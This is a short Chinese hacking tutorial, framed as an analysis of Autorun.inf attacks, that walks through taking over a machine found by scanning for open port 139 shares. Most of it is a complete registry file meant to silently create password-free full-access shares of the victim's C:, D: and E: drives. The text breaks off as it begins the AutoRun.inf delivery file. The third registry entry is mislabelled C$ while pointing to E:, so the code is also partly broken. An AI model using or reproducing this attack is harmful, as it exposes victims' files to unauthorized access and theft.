解析来自Autorun.inf文件的攻击

　　下面就举个例子：如果你扫到一台开着139共享的机器，而对方只完全共享了D盘，我们要让对方的所有驱动器都共享。首先编辑一个注册表文件，打开记事本，键入以下内容：

　　REGEDIT4
　　'此处一定要空一行
　　[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$]
　　"Path"="C:\\"
　　"Remark"=""
　　"Type"=dword:00000000
　　"Flags"=dword:00000302
　　"Parmlenc"=hex:
　　"Parm2enc"=hex:

　　[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\D$]
　　"Path"="D:\\"
　　"Remark"=""
　　"Type"=dword:00000000
　　"Flags"=dword:00000302
　　"Parmlenc"=hex:
　　"Parm2enc"=hex:

　　[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$]
　　"Path"="E:\\"
　　"Remark"=""
　　"Type"=dword:00000000
　　"Flags"=dword:00000302
　　"Parmlenc"=hex:
　　"Parm2enc"=hex:

　　以上我只设置到E盘，如果对方有很多逻辑盘符的请自行设置。将以上部分另存为Share.reg文件备用。要特别注意REGEDIT4为大写且顶格书写，其后要空上一行，在最后一行记得要按一次回车键。

　　然后打开记事本，编制一个AutoRun.inf文件，键入以下内容：